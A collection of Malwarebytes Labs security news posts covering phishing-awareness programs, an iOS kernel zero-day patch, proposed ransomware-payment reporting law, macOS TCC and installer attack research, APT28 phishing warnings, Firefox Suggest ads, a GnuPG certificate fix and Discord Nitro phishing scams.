IT NEWS

The joy of phishing your employees

Many companies set up phishing test programs for their employees, often as part of a compliance requirement involving ongoing employee education on security topics. The aim of these programs is to train employees on how to spot a malicious link, not click it, and forward it on to the appropriate responder, but most of these programs do not meaningfully achieve this. Let’s take a look at some common pitfalls and how to step around them.

You’re annoying your employees

Click-through rates on a real phish average between 10 and 33 percent of untrained users, depending on which security vendor you ask. But test phishes are sent to everyone, indiscriminately, taking time and energy away from those who are more or less doing the right thing already.

And while an organizational baseline is useful, and compliance can mandate a certain degree of repetition, repeatedly testing all employees without any sort of targeting can create a certain degree of security blindness on their part. There’s also often a lack of real-world tactics on the part of the tester due to a need to hit large quantities of people at the same time.

A better solution is to conduct infrequent, all-hands tests as a baseline, then take a look at your failures. Do you have clusters, and where are they? What job function is most common in the failures, and how does that map to overall security risk? A repeated failure in Marketing has a different impact than one in Finance.

With a good grasp of where your risk is, you can start focusing on problem areas of the organization with challenging, more frequent tests that use real-world tactics. While an all hands phish might be an untargeted credential harvester, a high-risk phish test might look more like a malicious invoice sent by a fake vendor to a select group in the Finance department.

You’re not including execs

Executives are frequently not included in enterprise security testing, most likely due to difficulty getting buy-in on a topic that some C-Suites view as esoteric. They also are a population most likely to engage in off-channel communications like SMS or bring your own device (BYOD) mobile mail using unsupported clients. However, executives—if successfully phished—can cause some of the most significant dollar losses to the organization than anyone else. While a single compromised credential pair at the ground level is typically a recoverable incident, business email compromise (BEC) aimed at an executive has caused up to $121 million dollars in single-incident losses.

Successful inclusion of executives in a phishing training program would involve spearphishing, rather than a canned phish. The key indicator of a well-formed phish is mirroring the tactics found in the wild, so your high-value targets require a high effort pitch. Make sure that your phish test vendor includes a markup editor to construct custom phishes from scratch so that you can alternate between a canned mass mailer and a laser-focused spearphish, as needed.

You’re not changing your approach

Just as security staff can get alert fatigue and start missing important alarms from their tooling, non-technical staff can get test fatigue and start associating threats with one particular phish format that you use too much. Best practice should include frequent rotation of pitch type and threat type; malicious link, malicious attachment, and pure scam threats present differently and have their own threat ecosystems that warrant their own test formats.

If you’ve been using your test failures to highlight problem areas, that’s a great place to start varying how you conduct your tests. A failure cluster in a Finance department would respond fairly well to attachment-based phish tests, with pitch text focused around payment themed keywords. Given that impact of a breach to that department would also be high risk, more frequent and more difficult tests give better outcomes over the long term. The key point is that phish tests are sensors for organizational risk and should be tuned for accuracy frequently.

You’re not using the data

Okay, so you’ve checked that compliance tick box, created a test schedule that ratchets in to your problem areas over time, and you’re running custom spearphishes against your execs. You can call it a day, right?

Hitting these marks can get you a large security advantage over other companies, but to really realize the full advantages of a security training program, you need to start sifting through the data that the program generates.

A great place to start is looking at where your failures sit. Are they evenly distributed, or do they cluster in particular departments? Are they individual contributors, or management? More importantly, which types of phishes do they click on most?

All of these questions can drive identification of high risk areas of the company, as well as prioritize which security controls should be implemented first. Rather than a top-down command approach, looking at the impact of a simulated attack can provide a clear view of where to start with a broader security improvement program.

If it’s not fun, you’re doing it wrong

Last and most importantly, this should be fun. The more creativity and variety injected into the process by security staff, the more effective the user awareness will be. And that doesn’t just extend to phish variety—user reports can and should be acknowledged at the organizational level.

Users can submit phish pitches, or preferred organization targets. Some phish test vendors even include stats broken out by department or manager that lend themselves very well towards friendly competition. Engaging employees beyond “Don’t do that” not only creates better security outcomes, but it tends to create better communication outcomes throughout a company.

Most corporate phishing programs do not meet their stated goals. The reasons for this can include overweighting compliance goals to the exclusion of others, complacency in test format, vendor choice making it tough to analyze data from the program, and failure to give dedicated resources to testing. These are largely avoidable if an organization shifts focus on their testing programs from a checkbox to risk analysis.

Overall, folding phish testing into a broader look at cyber risk can provide hard data that can drive security controls and increase organizational buy-in.

The post The joy of phishing your employees appeared first on Malwarebytes Labs.

ExpressVPN made a choice, and so did I: Lock and Code S02E19

On September 14, the US Department of Justice announced that it had resolved an earlier investigation into an international cyber hacking campaign coming from the United Arab Emirates that has reportedly impacted hundreds of journalists, activists, and human rights defenders in Yemen, Iran, Turkey, and Qatar. The campaign, called Project Raven, has been in clandestine operation for years, and it has relied increasingly on a computer system called “Karma.”

But in a bizarre twist, this tale of surveillance abroad tapered inwards into a tale of privacy at home, as one of the three men named by the Department of Justice for violating several US laws—and helping build Karma itself—is Daniel Gericke, the chief information officer at ExpressVPN.

Today, on Lock and Code, host David Ruiz explores how these developments impacted his personal decision in a VPN service. For years, Ruiz had been a paying customer of the VPN, but a deep interest in surveillance and a background in anti-surveillance advocacy forced him to reconsider.

Tune in to hear the depth of the unveiled surveillance campaign, who it affected, for how long, and what role, specifically, Gericke had in it, on this week’s Lock and Code podcast, by Malwarebytes Labs.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

You can also find us on Apple PodcastsSpotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post ExpressVPN made a choice, and so did I: Lock and Code S02E19 appeared first on Malwarebytes Labs.

Update now! Apple patches another privilege escalation bug in iOS and iPadOS

Apple has released a security update for iOS and iPad that addresses a critical vulnerability reportedly being exploited in the wild.

The update has been made available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one is listed as CVE-2021-30883 and allows an application to execute arbitrary code with kernel privileges. Kernel privileges can be achieved by using a memory corruption issue in the “IOMobileFrameBuffer” component.

Kernel privileges are a serious matter as they offer an attacker more than administrator privileges. In kernel mode, the executing code has complete and unrestricted access to the underlying hardware. It can execute any CPU instruction and reference any memory address. Kernel mode is generally reserved for the lowest-level, most trusted functions of the operating system.

Researchers have already found that this vulnerability is exploitable from the browser, which makes it extra worrying.

Watering holes are used as a highly targeted attack strategy. The attacker infects a website where they knows the intended victim(s) visits regularly. Depending on the nature of the infection, the attacker can single out their intended target(s) or just infect anyone that visits the site unprotected.

IOMobileFrameBuffer

IOMobileFramebuffer is a kernel extension for managing the screen framebuffer. An earlier vulnerability in this extension, listed as CVE-2021-30807 was tied to the Pegasus spyware. This vulnerability also allowed an application to execute arbitrary code with kernel privileges. Coincidence? Or did someone take the entire IOMobileFramebuffer extension apart and save up the vulnerabilities for a rainy day?

Another iPhone exploit called FORCEDENTRY was found to be used against Bahraini activists to launch the Pegasus spyware. Researchers at Citizen Lab disclosed this vulnerability and code to Apple, and it was listed as CVE-2021-30860.

Undisclosed

As is usual for Apple, both the researcher that found the vulnerability and the circumstances under which the vulnerability used in the wild are kept secret. Apple didn’t respond to a query about whether the previously found bug was being exploited by NSO Group’s Pegasus surveillance software.

Zero-days for days

Over the last months Apple has had to close quite a few zero-days in iOS, iPadOS,and macOS. Seventeen if I have counted correctly.

  • CVE-2021-1782 – iOS-kernel: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-1870 – WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-1871 – WebKit: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-1879 – WebKit: Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30657 – Gatekeeper: A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30661 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30663 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution.
  • CVE-2021-30665 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30666 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30713 – TCC: A malicious application may be able to bypass Privacy preferences. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30761 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30762 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30807 – IOMobileFrameBuffer: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited. Tied to Pegasus (see above).
  • CVE-2021-30858 – WebKit: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
  • CVE-2021-30860 – CoreGraphics: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. This is FORCEDENTRY (see above).
  • CVE-2021-30869 – XNU: A malicious application may be able to execute arbitrary code with kernel privileges. Reportedly being actively exploited by attackers in conjunction with a previously known WebKit vulnerability.

And last but not least, the latest addition—CVE-2021-30883—which means that of the 17 zero-days that were fixed over the course of a handful of months, at least 16 were found to be actively exploited.

Update

Apple advises users to update to iOS 15.0.2 and iPadOS 15.0.2 which can be done through the automatic update function or iTunes.

Stay safe, everyone!

The post Update now! Apple patches another privilege escalation bug in iOS and iPadOS appeared first on Malwarebytes Labs.

Ransom Disclosure Act would mandate ransomware payment reporting

In an effort to better understand and clamp down on the ransomware economy and its related use of cryptocurrencies, US Senator and past presidential hopeful Elizabeth Warren and US House Representative Deborah Ross introduced a new bill last week that would require companies and organizations to report any paid ransomware demands to the Secretary of the Department of Homeland Security.

“Ransomware attacks are skyrocketing, yet we lack critical data to go after cybercriminals,” said Senator Warren in a prepared release. “My bill with Congresswoman Ross would set disclosure requirements when ransoms are paid and allow us to learn how much money cybercriminals are siphoning from American entities to finance criminal enterprises—and help us go after them.”

If passed, the “Ransom Disclosure Act” would require a broad set of companies, local governments, and nonprofits that actually pay off ransomware demands to report those payments to the government. Companies would need to report this information within 48 hours of paying a ransom.

Specifically, those affected by the bill would need to tell the Secretary of the Department of Homeland Security:

  • The date on which such ransom was demanded
  • The date on which such ransom was paid
  • The amount of such ransom demanded
  • The amount of such ransom paid

Companies would also need to disclose what currency they paid the ransom in, including whether the payment was made with any cryptocurrency. Companies would also have to offer “any known information regarding the identity of the actor demanding such ransom.”

The bill’s focus on cryptocurrencies acknowledges the technology’s core role in ransomware today, as likely not a single big ransomware payment has been made for years in anything other than crypto. But this reliance on cryptocurrency seems to finally be catching up to ransomware criminals, as cryptocurrency, while providing somewhat decent pseudonymity, instead provides incredible records. And international police are now excelling at following those records.  

In June, the US Department of Justice announced that, after following a series of cryptocurrency transactions across cyberspace, it eventually retrieved much of the ransomware payment that Colonial Pipeline paid to recover from its own ransomware attack in May. And earlier in October, Europol said it provided “crypto-tracing support” when the FBI, the French National Gendarmerie, and the Ukrainian National Police seized $375,000 in cash and another $1.3 million in cryptocurrencies during related arrests against “two prolific ransomware operators known for their extortionate ransom demands (between €5 to €70 million).”

This work, while encouraging in the fight against ransomware, largely happens in the dark, though, as ransomware payments made by companies are still kept considerably private. The Ransom Disclosure Act, then, seeks to shine a light on that darkness to better aid the fight. Said US House Representative Ross:

“Unfortunately, because victims are not required to report attacks or payments to federal authorities, we lack the critical data necessary to understand these cybercriminal enterprises and counter these intrusions.”

The Ransom Disclosure Act would also require the Secretary of Homeland Security to develop penalties for non-compliance and to, one year after the passage of the bill, publish a database on a public website that includes ransom payments made in the year prior. That database must be accessible to the public, and it must include the “total dollar amount of ransoms paid” by companies, but the companies’ identifying information must be removed. The information gleaned from the incoming reports must also be packaged into a study by the Secretary of Homeland Security that specifically explores “the extent to which cryptocurrency has facilitated the kinds of attacks that resulted in the payment of ransoms by covered entities,” and the Secretary of Homeland Security must also then present the findings of that study to Congress.

Finally, according to the bill, individuals who make ransomware payments after personally being hit with ransomware must also have a way to voluntarily report their information to the government if they so choose.

The post Ransom Disclosure Act would mandate ransomware payment reporting appeared first on Malwarebytes Labs.

Inside Apple: How macOS attacks are evolving

The start of fall 2021 saw the fourth Objective by the Sea (OBTS) security conference, which is the only security conference to focus exclusively on Apple’s ecosystem. As such, it draws many of the top minds in the field. This year, those minds, having been starved of a good security conference for so long, were primed and ready to share all kinds of good information.

Conferences like this are important for understanding how attackers and their methods are evolving. Like all operating systems, macOS presents a moving target to attackers as it acquires new features and new forms of protection over time.

OBTS was a great opportunity to see how attacks against macOS are evolving. Here’s what I learned.

Transparency, Consent, and Control bypasses

Transparency, Consent, and Control (TCC) is a system for requiring user consent to access certain data, via prompts confirming that the user is okay with an app accessing that data. For example, if an app wants to access something like your contacts or files in your Documents folder on a modern version of macOS, you will be asked to allow it before the app can see that data.

A TCC prompt asking the user to allow access to the Downloads folder
A TCC prompt asking the user to allow access to the Downloads folder

In recent years, Apple has been ratcheting down the power of the root user. Once upon a time, root was like God—it was the one and only user that could do everything on the system. It could create or destroy, and could see all. This hasn’t been the case for years, with things like System Integrity Protection (SIP) and the read-only signed system volume preventing even the root user from changing files across a wide swath of the hard drive.

TCC has been making inroads in further reducing the power of root over users’ data. If an app has root access, it still cannot even see—much less modify—a lot of the data in your user folder without your explicit consent.

This can cause some problems. For example, antivirus software such as Malwarebytes needs to be able to see everything it can in order to best protect you. But even though some Malwarebytes processes are running with root permissions, they still can’t see some files. Thus, apps like this often have to require the user to give a special permission called Full Disk Access (FDA). Without FDA, Malwarebytes and other security apps can’t fully protect you, but only you can give that access.

This is generally a good thing, as it puts you in control of access to your data. Malware often wants access to your sensitive data, either to steal it or to encrypt it and demand a ransom. TCC means that malware can’t automatically gain access to your data if it gets onto your system, and may be a part of the reason why we just don’t see ransomware on macOS.

TCC is a bit of a pain for us, and a common point of difficulty for users of our software, but it does mean that we can’t get access to some of your most sensitive files without your knowledge. This is assuming, of course, that you understood the FDA prompts and what you were agreeing to, which is debatable. Apple’s current process for assigning FDA doesn’t make that clear, and leaves it up to the app asking for FDA to explain the consequences. This makes tricking a user into giving access to something they shouldn’t pretty easy.

However, social engineering isn’t the only danger. Many researchers presenting at this year’s conference talked about bugs that allowed them to get around the Transparency, Consent, and Control (TCC) system in macOS, without getting user consent.

Andy Grant (@andywgrant) presented a vulnerability in which a remote attacker with root permissions can grant a malicious process whatever TCC permissions is desired. This process involving creating a new user on the system, then using that user to grant the permissions.

Csaba Fitzl (@theevilbit) gave a talk on a “Mount(ain) of Bugs,” in which he discussed another vulnerability involving mount points for disk image files. Normally, when you connect an external drive or double-click a disk image file, the volume is “mounted” (in other words, made available for access) within the /Volumes directory. In other words, if you connect a drive named “backup”, it would become accessible on the system at /Volumes/backup. This is the disk’s “mount point.”

Mountain of bugs
Title slide of Csaba Fitzl’s “Mount(ain) of Bugs” talk

Csaba was able to create a disk image file containing a custom TCC.db file. This file is a database that controls the TCC permissions that the user has granted to apps. Normally, the TCC.db file is readable, but cannot be modified by anything other than the system. However, by mounting this disk image while also setting the mount point to the path of the folder containing the TCC.db file, he was able to trick the system into accepting his arbitrary TCC.db file as if it were the real one, allowing him to change TCC permissions however he desired.

There were other TCC bypasses mentioned as well, but perhaps the most disturbing is the fact that there’s a fairly significant amount of highly sensitive data that is not protected by TCC at all. Any malware can collect that data without difficulty.

What is this data, you ask? One example is the .ssh folder in the user’s home folder. SSH is a program used for securely gaining command line access to a remote Mac, Linux, or other Unix system, and the .ssh folder is the location where certificates used to authenticate the connection are stored. This makes the data in that folder a high-value target for an attacker looking to move laterally within an organization.

There are other similar folders in the same location that can contain credentials for other services, such as AWS or Azure, which are similarly wide open. Also unprotected are the folders where data is stored for any browser other than Safari, which can include credentials if you use a browser’s built-in password manager.

Now, admittedly, there could be some technical challenges to protecting some or all of this data under the umbrella of TCC. However, the average IT admin is probably more concerned about SSH keys or other credentials being harvested than in an attacker being able to peek inside your Downloads folder.

Attackers are doing interesting things with installers

Installers are, of course, important for malware to get installed on a system. Often, users must be tricked into opening something in order to infect their machine. There are a variety of techniques attackers can use that were discussed.

One common method for doing this is to use Apple installer packages (.pkg files), but this is not particularly stealthy. Knowledgeable and cautious folks may choose to examine the installer package, as well as the preinstall and postinstall scripts (designed to run exactly when you’d expect by the names), to make sure nothing untoward is going on.

However, citing an example used in the recent Silver Sparrow malware, Tony Lambert (@ForensicITGuy) discussed a sneaky method for getting malware installed: The oft overlooked Distribution file.

The Distribution file is found inside Apple installer packages, and is meant to convey information and options for the installer. However, JavaScript code can also be inserted in this file, to be run at the beginning of the installation, meant to be used to determine if the system meets the requirements for the software being installed.

In the case of Silver Sparrow, however, the installer used this script to download and install the malware covertly. If you clicked Continue in the dialog shown below, you’d be infected even if you then opted not to continue with the installation.

An Apple installer asking the user to allow a program to run to determine if the software can be installed.
Click Continue to install malware

Another interesting trick Tony discussed was the use of payload-free installers. These are installers that actually don’t contain any files to be installed, and are really just a wrapper for a script that does all the installation (likely via the preinstall script, but also potentially via Distribution).

Normal installer scripts will leave behind a “receipt,” which is a file containing a record of when the installation happened and what was installed where. However, installers that lack an official payload, and that download everything via scripts, do not leave behind such a receipt. This means that an IT admin or security researcher would be missing key information that could reveal when and where malware had been installed.

Chris Ross (@xorrior) discussed some of these same techniques, but also delved into installer plugins. These plugins are used within installer packages to create custom “panes” in the installer. (Most installers go through a specific series of steps prescribed by Apple, but some developers add additional steps via custom code.)

These installer plugins are written in Objective-C, rather than scripting languages, and therefore can be more powerful. Best of all, these plugins are very infrequently used, and thus are likely to be overlooked by many security researchers. Yet Chris was able to demonstrate techniques that could be used by such a plugin to drop a malicious payload on the system.

Yet another issue was presented in Cedric Owens’ (@cedowens) talk. Although not related to an installer package (.pkg file), a vulnerability in macOS (CVE-2021-30657) could allow a Mac app to entirely bypass Gatekeeper, which is the core of many of Apple’s security features.

On macOS, any time you open an app downloaded from the Internet, you should at a minimum see a warning telling you that you’re opening an app (in case it was something masquerading as a Word document, or something similar). If there’s anything wrong with the app, Gatekeeper can go one step further and prevent you from opening it at all.

By constructing an app that was missing some of the specific components usually considered essential, an attacker could create an app that was fully functional, but that would not trigger any warnings when launched. (Some variants of the Shlayer adware have been seen using this technique.)

The post Inside Apple: How macOS attacks are evolving appeared first on Malwarebytes Labs.

A week in security (Oct 4 – Oct 10)

Last week on Malwarebytes Labs

Other cybersecurity news

The post A week in security (Oct 4 – Oct 10) appeared first on Malwarebytes Labs.

Google warns some users that FancyBear’s been prowling around

APT28, also known as FancyBear, is at the heart of another targeted campaign. This time, it’s sniffing around users of Google services. Some 14,000 people have been notified about a spear phish attempt looking to compromise accounts and access their files.

When did this happen?

Sometime late September, according to the folks at Google. They didn’t go into detail about which industries were key targets, but this campaign “compromised 86% of the batch of warnings we sent for this month”.

Did Google catch all the malicious missives?

Shane Huntley, Director of Google’s Threat Analysis Group, mentioned that they blocked all the emails sent. That seems pretty conclusive. He goes into more details in this thread:

As per his thoughts, these warnings are primarily to tell you to batten down the hatches for the next attack, whenever that might be.

Google has more information on this type of warning over on its security blog. If you ever see the below message, it’s definitely time to take action:

Government backed attackers may be trying to steal your password.

There’s a chance this is a false alarm, but we believe we detected government-backed attackers trying to steal your password., This happens to less than 0.1% of all Gmail users. We can’t reveal what tipped us off because the attackers will take note and change their tactics, but if they are successful at some point they could access your data or take other actions using your account.

Google recommends those affected join its Advanced Protection Program, which is says is its strongest protection for users at risk of targeted attacks.

What is the Advanced Protection Program?

Google’s Advanced Protection Program is another layer of security on top of regular Google protection, for those who need it. Physical security keys are a big feature of this program. The Chrome browser will also scan any and all files which attempt to download on a device. It also refuses files from untrusted/unknown sources on Android, and makes it more difficult for rogue files to gain permissions from the device.

What else is Google doing in this realm?

Well, Google is very much about auto-enrolment for things like 2FA these days. Take-up on 2FA is quite low across many services on the web, and something like this can only help boost everyone’s security a bit more.

There’s also Google’s Security Checkup feature. At a glance, this will tell you about logged in devices, recent security activity, whether or not you have 2FA enabled, and your Gmail settings including which addresses you may have blocked. Many of the tabs reveal more and more information as you go. The 2-step column will tell you about phones using sign-in prompts, which Authenticator app you’re using and when it was added, phone numbers, and backup codes.

Don’t forget, you can also see a list of IP addresses using your Gmail account on the desktop in the bottom right hand corner (“last account activity”). This shows the type of access (web? mobile?), location/IP address, and the date/time of said activity.

These are all useful things to help ward off compromise, and also perhaps figure out where something might have gone wrong.

Should I be worried?

As above, the risk from something like FancyBear is as good as negligible. If you work in a high risk occupation, or deal with sensitive data you feel governments may be interested in then, yes, you could potentially be a target, though this is still very slim pickings in terms of whether you should be worried about it. If you’re a journalist, an activist, work in human rights, are a lawyer, or work in some form of natsec role then you may want to sign up to the Advanced Protection Program.

Everyone else should realistically be more concerned about common or garden malware, scams, phishes, and so on. The good news is a lot of basic security practices to help ward off these attacks will also go some way towards warding off the big stuff. There is no detriment to yourself to start making use of said security practices…it’s win-win.

Do yourself a favour, and start digging through the multitude of security features Google has available. You’ll be surprised how easy it is to set most of it up, and you’ll be strengthening the security of your data at the same time.

The post Google warns some users that FancyBear’s been prowling around appeared first on Malwarebytes Labs.

Firefox reveals sponsored ad “suggestions” in search and address bar

Mozilla is trying a novel experiment into striking a balance between ad revenue generation and privacy protection by implementing a new way to deliver ads in its Firefox web browser—presenting them as “suggestions” whenever users type into the dual-use search and URL address bar.

The advertising experiment lies within a feature called “Firefox Suggest,” which was announced in September. According to Mozilla, Firefox Suggest “serves as a trustworthy guide to the better web, finding relevant information and sites to help you accomplish your goals.”

Much like other browsers, Firefox already offers users a bevy of suggestions depending on what they type into the search and address bar. That has included suggestions based on users’ bookmarks, browser histories, and their open tabs. But with the new Firefox Suggest feature, users will also receive suggestions from, according to Mozilla, “other sources of information such as Wikipedia, Pocket articles, reviews, and credible content from sponsored, vetted partners and trusted organizations.”

Though the explanation seems simple, the implementation is not.

That’s because there appear to be two different levels of suggestions for Firefox Suggest, which are only referred to by Mozilla as “Contextual suggestions,” and “improved results for Contextual Suggestions.”

On its support page for Firefox Suggest, Mozilla explicitly said that “contextual suggestions are enabled by default, but improved results through data sharing is only enabled when you opt-in.” That data sharing, covered in more detail below, broadly includes user “location, search queries, and visited sites,” Mozilla said.

How that additional data produces separate results, however, is unclear, because Mozilla remains frustratingly vague about the experience that users can expect if they have the default “contextual suggestions” enabled compared to users who have opted-in to “improved results for Contextual Suggestions.”

Under the heading “What’s on by default,” Mozilla said that, starting with Firefox version 92, users “will also receive new, relevant suggestions from our trusted partners based on what you’re searching for. No new types of data are collected, stored, or shared to make these new recommendations.”

Under the heading, “Opt-in Suggestions,” however, Mozilla only said that a “new type of even smarter” suggestion is being presented for some users that the company hopes will “enhance and speed up your searching experience.” Mozilla said that it “source[s] and partner[s] with trusted providers to serve up contextual suggestions related to your query from across the web,” which sounds confusingly similar to the default contextual suggestions that come from the company’s “trusted partners” and are “based on what you’re searching for.”

Fortunately, Mozilla offered a way for users to check if they’ve opted-in to the data sharing required for improved contextual suggestions. Unfortunately, when Malwarebytes Labs installed the latest version of Firefox (93.0 for MacOS), we could not find the exact language described in Mozilla’s support page.

Mozilla said that, for those who go into Firefox’s preferences:

“If you see ‘Contextual suggestions’ checked with the string ‘Firefox will have access to your location, search queries, and visited sites’, you have opted in. If you do not see that label then the default experience is enabled with no new kinds of data sharing.”

As shown in the image below, though we did find this setting in Firefox’s preferences, we did not find the exact language about “location, search queries, and visited sites.”

3 Firefox Suggest options

When Malwarebytes Labs tested Firefox Suggest, we could not produce any sponsored content results. We did, however, receive a Wikipedia suggestion on our search of “Germany” and a Firefox Pocket suggestion on our search of “chicken soup,” as shown below.

0 Firefox Germany
Firefox chicken soup

During our testing, we also could not find a way to opt-in to improved contextual suggestions. According to Mozilla, opting-in seems to currently rely on a notification message from Firefox asking users to specifically agree to sharing additional data. During our testing of Firefox Suggest, we did not receive such a message.

New model, new data

Firefox’s experiment represents a sort of double-edged sword of success.

In 2019, Mozilla decided to turn off third-party tracking cookies by default in its then-latest version of Firefox. It was a bold move at the time, but just months later, the privacy-forward browser Brave launched out of beta with similar anti-tracking settings turned on by default, and in 2020, Safari joined the anti-tracking effort, providing full third-party cookie blocking.

The anti-tracking campaign seems to have largely worked, as even Google has contemplated life after the third-party cookie, but this has put privacy-forward browsers in a difficult position. Advertising revenue can be vital to browser development, but online advertising is still rooted firmly in surreptitious data collection and sharing—the very thing these browsers fight against.

For its part, Brave has responded to this problem with its own advertising model, offering “tokens” to users who opt-into advertisements that show up as notifications when using the browser. The tokens can be used to tip websites and content creators. Similar to Mozilla, Brave also vets the companies who use its advertising platform.

As to the role of advertising partners in Firefox Suggest, Mozilla said it attempts to limit data sharing as much as possible. “The data we share with partners does not include personally identifying information and is only shared when you see or click on a suggestion,” Mozilla said.

To run improved suggestions, Mozilla does need to collect new types of data, though. According to the company’s page explaining that data collection:

“Mozilla collects the following information to power Firefox Suggest when users have opted in to contextual suggestions.

  • Search queries and suggest impressions: Firefox Suggest sends Mozilla search terms and information about engagement with Firefox Suggest, some of which may be shared with partners to provide and improve the suggested content.
  • Clicks on suggestions: When a user clicks on a suggestion, Mozilla receives notice that suggested links were clicked.
  • Location: Mozilla collects city-level location data along with searches, in order to properly serve location-sensitive queries.”

Based on the types of data Mozilla collects for improved contextual suggestions, we might assume that users who opt-in will see, at the very least, suggestions that have some connection to their location, like perhaps sponsored content for an auto shop in their city when they’re looking up oil changes. The data on a user’s suggestion clicks might also help Mozilla deliver other suggestions that are similar to the clicked suggestions, as they may have a higher success rate with a user.

As to whether the entire experiment works? It’s obviously too early to tell, but in the meantime, Mozilla isn’t waiting around to generate some cash. Just this year, the company released a standalone VPN product. It is the only product that Mozilla makes that has a price tag.

The post Firefox reveals sponsored ad “suggestions” in search and address bar appeared first on Malwarebytes Labs.

GnuPG fixes a problem with Let’s Encrypt certificate chain validation

Despite advance warnings that a root certificate provided by Let’s Encrypt would expire on September 30, users reported issues with a variety of services and websites once that deadline hit. So what happened?

The problem

A number of high profile tech and security companies noticed their products and services were affected by the certificate expiration, such as cloud computing services for Amazon, Google, and Microsoft, IT and cloud security services for Cisco, as well as sellers that were unable to log in on Shopify.

When a user’s browser arrives at your website one of the first things it checks for is the validity of the SSL certificate. An SSL certificate is a digital certificate that authenticates a website’s identity and enables an encrypted connection. SSL certificates are issued by a Certificate Authority (CA). Most browsers will accept certificates issued by hundreds of different CAs. Let’s Encrypt is a CA that provides digital certificates as a free non-profit and millions of websites rely on Let’s Encrypt services.

If the certificate, or the root certificate that signed it, has expired, it issues a warning that the site may not be secure or the connection is not private. At least 2 million people saw an error message on their phones, computers, or smart gadgets due to the certificate issue.

GnuPG

GnuPG free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories.

GnuPG is a command line tool without any graphical user that is often used as the actual crypto backend of other applications.

Even though many organizations had not forgotten about the certificate expiration, GnuPG did not handle it well. And since many were unaware of the fact they were even using GnuPG, because it functions as the backend of another application, it took some organizations a while to figure out and correct the problem. Without knowing the cause, it’s a difficult problem to identify. For the affected companies, it’s not like everything is down, but they’re certainly having all sorts of service issues.

The update

The new version of GnuPG 2.2.32 (LTS) fixes the problem with Let’s Encrypt certificate chain validation, and this update should restore access to many web resources (e.g. Web Key Directory and key servers). “LTS” is short for long term support, and this series of GnuPG is guaranteed to be maintained at least until the end of 2024.

SSL/TLS certificate management

Digital certificates are the primary vehicle by which people and machines are identified and authenticated. As the number of identities in a company grows, so does the difficulty of managing and protecting certificates at scale. The adoption of BYOD and IoT makes certificate management even more critical than ever.

Like passwords and keys, certificates also go through a cycle. They’re created, provisioned into the infrastructure, and have a finite validity period after which they expire. Certificate Management is usually concerned only with certificates issued by mutually trusted Certificate Authorities. Once the digital certificates have been issued, they must be managed diligently through their entire validity period.

If this incident has shown one thing that is how important it is to keep track of all the digital certificates that your organization relies on.

The post GnuPG fixes a problem with Let’s Encrypt certificate chain validation appeared first on Malwarebytes Labs.

Discord scammers lure victims with promise of free Nitro subscriptions

A number of bogus offers are doing the rounds in Discord land at the moment. Discord, a group text chat/VoiP app of choice for many gaming communities, is having a bit of trouble with phishing links.

You may recall we’ve covered a lot of Discord scams previously. Service users can create bots, those bots can be invited into channels, and then they get to work spamming. The messages run the range of free games, discount sign-ups for services, or just plain old fake login screens.

You’ll also frequently see bots pushing offers for things which simply don’t exist anymore. Their purpose is to hit the channels and drift forever, spamming all and sundry until they get a few hits. This week it’ll be a bot promoting a “red hot” offer from 2018. Next week it’ll be promoting crossover deals with a service which went out of business a year ago.

While many gamers who know their stuff won’t fall for those kinds of things, plenty of others will. They could stand to lose their gaming accounts, their logins for other services, some money, or perhaps a combination of all 3. Depending on the scam, they could also be used to send spam messages to an even bigger audience. You definitely don’t want any of this clogging up the channels you use on a daily basis.

What’s happening?

Spam messages are sent to other Discord users. As is common with this kind of attack, they’re themed around “Nitro”. This is a paid Discord service which offers added functionality in the servers along with some other features. At one point, games were included in some of these deals, and those were a big target for scammers even after the games were no longer available. The scammers are just banking on nobody checking before clicking the links.

Here’s what some of the current messages going around look like:

Note that this isn’t being sent from bots (as in, chatbots specifically coded to send spam links). As the Tweeter points out, this is all being sent by friends. Those friends have likely been compromised earlier in the chain, and are now being used for malicious purposes.

As for the messages themselves? They’re a mixed bunch. One claims a friend has sent the recipient a Nitro subscription. The others claim the recipient “has some Nitro left over”, tied to a URL which mentions billing and promotions.

When sneaky sites go phishing…

The sites here use a common trick. This is where they switch out the letter i, for an L in the URL. As a result, you’re not visiting Discord, you’re visiting something along the lines of dLscord instead (we’re using the uppercase L here purely for visual clarity).

discord phish 1
Hunting for phish
discord phish 3
If it seems too good to be true…

From there, it’s a case of phishing the victim’s logins.

Tackling the Discord phishers

